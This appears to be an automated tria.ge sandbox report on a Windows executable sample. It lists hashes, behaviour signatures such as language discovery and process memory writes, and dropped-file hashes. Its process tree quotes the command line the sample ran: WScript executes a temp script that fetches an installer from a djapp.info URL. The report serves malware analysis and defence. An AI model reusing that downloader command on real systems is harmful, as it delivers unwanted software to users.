Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13/10/2024, 10:32
Static task
static1
Behavioral task
behavioral1
Sample
3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
Resource
win7-20240903-en
General
-
Target
3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe
-
Size
184KB
-
MD5
3f5936f8c4c1416eb39b4c3f5335c20c
-
SHA1
3f82a1f53548fdddfa6aa54862f37fb3bab0c1ea
-
SHA256
1575aef9498b17365cfd11088dd585b4a14b056b7c43abc6a5c83389fd87e572
-
SHA512
ad0725153fa1c232640e62734e5b72454053a282378a0777d9e233b5b25104fabdbfbdbdac28385a0ed12e64d5c7d4d7288c034492a160c24ae5c69927990110
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndnS
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 2796 WScript.exe 8 2796 WScript.exe 10 2796 WScript.exe 12 3016 WScript.exe 13 3016 WScript.exe 15 1608 WScript.exe 17 1608 WScript.exe 19 2992 WScript.exe 20 2992 WScript.exe 22 2280 WScript.exe 23 2280 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1620 2684 WerFault.exe 29 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2684 wrote to memory of 2796 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 30 PID 2684 wrote to memory of 2796 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 30 PID 2684 wrote to memory of 2796 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 30 PID 2684 wrote to memory of 2796 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 30 PID 2684 wrote to memory of 3016 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 32 PID 2684 wrote to memory of 3016 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 32 PID 2684 wrote to memory of 3016 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 32 PID 2684 wrote to memory of 3016 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 32 PID 2684 wrote to memory of 1608 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 34 PID 2684 wrote to memory of 1608 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 34 PID 2684 wrote to memory of 1608 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 34 PID 2684 wrote to memory of 1608 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 34 PID 2684 wrote to memory of 2992 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 36 PID 2684 wrote to memory of 2992 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 36 PID 2684 wrote to memory of 2992 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 36 PID 2684 wrote to memory of 2992 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 36 PID 2684 wrote to memory of 2280 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 38 PID 2684 wrote to memory of 2280 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 38 PID 2684 wrote to memory of 2280 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 38 PID 2684 wrote to memory of 2280 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 38 PID 2684 wrote to memory of 1620 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 41 PID 2684 wrote to memory of 1620 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 41 PID 2684 wrote to memory of 1620 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 41 PID 2684 wrote to memory of 1620 2684 3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3f5936f8c4c1416eb39b4c3f5335c20c_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:3016
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf74F1.js" http://www.djapp.info/?domain=rcDXgdudxA.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rUofZzdt C:\Users\Admin\AppData\Local\Temp\fuf74F1.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1842⤵
- Program crash
PID:1620
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD53cf1dd99bd0c2838a8033354b70fb158
SHA16d896ae4b40bdc30ee264f39bb5c4088ef6ac0e6
SHA256fb1a03bbf5a8cf7c6861729b3ffc215698fe92392be72d25fa8a4f21931339f9
SHA5127900536b78d87a586f37005d4035da51069cac520c653b8a9c506589718dea3c53a982756f3de72ba2443b556d5084b1776f15c7717d7bbea8b733970e02c88c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ec1e73330cfda39925084459eedf146a
SHA1ce1319b98100d0a50def60568ac5be70d0f28dde
SHA2569f2291db3ceb9ac6e6df43045973fee22b109396767ee054aa276c1927b4dc76
SHA51259c6e62a3a22de4bb0f1c7ae14268e4db91ae9e5c3d82f071bcd6eed205c1fbe6b24d243ff921f6c95339e3d36bc15a64acea34ab73b58697982dd62e32e832f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD53ade44fac3c2777d0ab82c8830374924
SHA129699a73110a6c30ca8434c8c88f8a663d03442f
SHA25682129e25f198238dd735ca3ca678cc4a84390218df58bccfb812344109216490
SHA512de89b5657e26494830cbfe275d3dfbe20809ac0fac071081d90d6de1664a8d5807d414721e74abe9251ddc7109a556a05a780f563eafbf831f359453857531a2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm
Filesize6KB
MD57f739f3c76b77c71158ae6004e35e1df
SHA1d5bfd67d8cd437fe0b8caef12ab21d901c8a678b
SHA256f98aed0674e594d91809b73553b8cda22b1d642f63bf4adbb49637a1e6b08951
SHA512a0bf2f7f0a4b6ac1c1fc5fc27bcffa516f90b42d6b2224d46528dea3b7d4e137fc2ed9976e0c179cf678cb5ef334950e889cb66b2ff943f10db223b259a09f4f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm
Filesize6KB
MD581a752c472df96994b8178a56d757591
SHA1dd11b977434a83c2a72396f5c73b99de55012964
SHA256e101e495d76c572cf17f88642476975e8acd26e7fb44a76324c2cff250be42c1
SHA512b992a773e66ee5ff105e6812315e7819c34d3ac55814b95e169c71be00d218fafe7571ba02a287c42be8c46e02d5c375b8987bc26dedff9d753d7ed942e70c51
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm
Filesize40KB
MD5c2901b4bf8907cd6b3b2a41348e38750
SHA194ce57047880d8c1384cab66872bb741a7e85733
SHA256e0a6b70cefdc692a7f0cf774602df4863101dd0e8dff274c0f2a17fa13e1ea27
SHA5127d02263052add9ce1a90bb92588d1ba75c7f97bb072b2359d97f729bcf1e11659edf618495c22c1bbbb376d326dab3a8e040a2b30c7f7e97c8a100256903c60c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm
Filesize40KB
MD563975738acc68c6d79c5b405dab79073
SHA1ecc73f5abde424e9c8937f199184910c1159d870
SHA256852cd59298282829affb6d77064dd96a8db186c807913b0d0d53cffebb4a5534
SHA51227bf3ade0d40599efa813fe30e03f981d888caf8b576b3c5a6f9e8033180a16a8014a34ed66b85f8faad4ffbdb5057c2badcd162a0d27aba324035f270dde553
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
175B
MD585d9d388549f2749f02907219d310334
SHA1051d0fb52f817bcbc9b4bc62339205e826a62b09
SHA25689d3052b24efff2ff417934fa89976bf2f04336c03d8e0a2f4208e47a46ccd3b
SHA51224569673e068a5685c1acb68f1d90d7891ad586bda977d4a51636f6265985763a2dc46ceae4b98f3a9c2a214b975f7f2ffc27c273b22ff3a49a1883b8faf5ce7